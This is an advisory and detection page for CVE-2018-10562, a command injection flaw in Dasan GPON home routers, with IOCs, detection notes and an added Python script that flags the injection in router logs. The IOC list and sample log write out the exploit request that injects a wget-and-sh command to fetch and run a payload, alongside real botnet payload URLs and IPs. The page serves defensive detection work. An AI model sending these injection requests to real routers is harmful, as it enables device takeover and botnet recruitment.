CVE-2018-10562
published 2018-05-04


Priority: P1 (96), critical, 9.8 CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Ransomware, Initial access
CISA Known Exploited Vulnerability, due 2022-04-21
Exploited in the wild
EPSS: 99.95% (100.0th percentile)
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.

Detection & IOCs (extracted from sources)

  • url: GponForm/diag_Form
  • path: /tmp/gpon80
  • path: /tmp/gpon8080
  • command: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
  • command: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s/gpon8080+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
  • hash: 3908cc1d8001f926031fbe55ce104448dbc20c9795b7c3cfbd9abe7b789f899d
  • hash: 320ed65d955bdde8fb17a35024f7bd978d26c041de1ddcf8a592974f77d82401
  • hash: be1d722af56ba8a660218a8311c0482c5b2d096ba91485e7d9dfc12a2b8e00b3
  • ip: 213.183.53.120
  • ip: 46.243.189.101
  • url: hxxp://46.243.189.101/gang/
  • domain: gpon.party
  • url: hxxp://hakaiboatnet.pw/m
  • hash: 402f7be58a8165c39e95b93334a706ec13fe076a2706d2c32d6360180bba0a74
  • hash: 76af2c3ff471916bc247e4c254c9b2affa51edb7e1a18825f36817e8c5921812
  • hash: 7bd284f4da09d3a95472a66e0867d778eeb59ed54738f6fb6e417e93c0b65685
  • hash: f693442a7e30876b46fd636d9df25495261be5c1a4f7b13e0fe5afc1b908e774
  • hash: 2e66ee1b4414fe2fb17da4372c43a826dd7767c189120eafd427773769302e35
  • ip: 185.244.25.168
  • url: 185.244.25.168/mips
  • url: 185.244.25.168/x86
  • url: 185.244.25.168/OwO/Tsunami.mips
  • url: 185.244.25.168/x86/mipsel
  • ip: 185.244.25.221
  • url: 185.244.25.221/bins/Yowai.mips
  • url: 185.244.25.221/bins/Yowai.mpsl
  • url: 185.244.25.221/bins/Yowai.x86
  • url: 185.244.25.221/Yowai.mips

Detection notes:
  • Exploit requests target the URI GponForm/diag_Form with POST parameters XWebPageName=diag, diag_action=ping, and shell metacharacters (backtick command injection) in the dest_host parameter.
  • Attackers retrieve command output by revisiting /diag.html after injecting commands; monitor for GET requests to /diag.html following suspicious POST requests to GponForm/diag_Form.
  • Exploit payload drops and executes wget-fetched binaries in /tmp (e.g., /tmp/gpon80, /tmp/gpon8080); monitor for file creation and shell execution in /tmp on GPON router firmware.
  • CVE-2018-10562 is chained with CVE-2018-10561 (authentication bypass); detection should look for unauthenticated POST requests to GponForm/diag_Form.
  • Omni/Mirai variant samples use XOR encryption table key 0xBAADF00D for config string encryption; use this key when decrypting captured botnet config tables.
  • Okane campaign payload server briefly replaced with Cloudflare DNS IP 1.1.1.1 on June 13; monitor for botnet C2 traffic pivoting to 1.1.1.1 as a payload source.
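The first three detection notes describe a pattern a defender can check for in router or upstream web-server logs: a POST to GponForm/diag_Form whose dest_host holds shell metacharacters, followed shortly by a GET to /diag.html from the same client, with a payload written under /tmp. The script below is an added example written for this page (it is not code from the page's sources or from the router vendor). It assumes a hypothetical log format of "client_ip ISO-time METHOD path body" and runs over a constructed sample in which the injected request reuses the shape of the command IOC above with the payload host replaced by the placeholder PAYLOAD_HOST; the other sample clients are documentation addresses, not real IOCs.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed sample log in a hypothetical router access-log format:
# "<client_ip> <ISO-8601 time> <METHOD> <path> <urlencoded body or ->".
# The first POST body follows the request shape listed in the IOCs, with the
# payload host replaced by the placeholder PAYLOAD_HOST. Not captured traffic.
SAMPLE_LOG = """\
203.0.113.10 2018-05-04T10:00:01 GET /diag.html -
203.0.113.10 2018-05-04T10:00:05 POST /GponForm/diag_Form XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://PAYLOAD_HOST/gpon80+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
203.0.113.10 2018-05-04T10:00:09 GET /diag.html -
198.51.100.7 2018-05-04T10:01:00 POST /GponForm/diag_Form XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=192.0.2.1&ipv=0
198.51.100.7 2018-05-04T10:01:04 GET /diag.html -
192.0.2.55 2018-05-04T10:02:00 POST /GponForm/diag_Form XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8%3Bid&ipv=0
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")
# A legitimate ping target is a hostname or IP literal; anything else in
# dest_host (backticks, ';', '|', '$', whitespace, ...) is treated as injection.
SAFE_HOST_RE = re.compile(r"^[A-Za-z0-9.:\-]+$")
# A GET /diag.html from the same client within this window after the POST is
# counted as retrieval of the injected command's output.
RETRIEVAL_WINDOW = timedelta(seconds=60)


def parse_line(line):
    """Parse one log line into a dict, or return None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, ts, method, path, body = m.groups()
    return {"ip": ip, "time": datetime.fromisoformat(ts),
            "method": method, "path": path, "body": body}


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body. Split only on '&'
    so that ';' inside a value (the injection separator) is preserved."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def injected_dest_host(event):
    """Return the decoded dest_host if the event is a diag_Form ping request
    whose dest_host is not a plain host/IP, otherwise None."""
    if event["method"] != "POST" or not event["path"].endswith("GponForm/diag_Form"):
        return None
    params = parse_body(event["body"])
    if params.get("diag_action") != "ping":
        return None
    dest = params.get("dest_host", "")
    if dest and not SAFE_HOST_RE.match(dest):
        return dest
    return None


def analyze(log_text):
    """Flag injection attempts, note whether the payload targets /tmp, and
    whether the same client came back for the output via /diag.html."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    findings = []
    for i, ev in enumerate(events):
        dest = injected_dest_host(ev)
        if dest is None:
            continue
        deadline = ev["time"] + RETRIEVAL_WINDOW
        retrieved = any(
            later["ip"] == ev["ip"] and later["method"] == "GET"
            and later["path"] == "/diag.html"
            and ev["time"] < later["time"] <= deadline
            for later in events[i + 1:]
        )
        findings.append({
            "ip": ev["ip"],
            "time": ev["time"].isoformat(),
            "dest_host": dest,
            "drops_to_tmp": "/tmp/" in dest,
            "output_retrieved": retrieved,
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The body is decoded by hand rather than with parse_qs because older Python releases also split form bodies on ';', which would cut the injected command apart and hide the metacharacters. The legitimate ping to 192.0.2.1 produces no finding even though it is followed by a /diag.html visit, so the /diag.html correlation only enriches a hit, it does not create one.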

CVSS provenance

  • nvd v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • nvd v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
  • vulncheck: 9.8 CRITICAL
  • cisa: 9.8 CRITICAL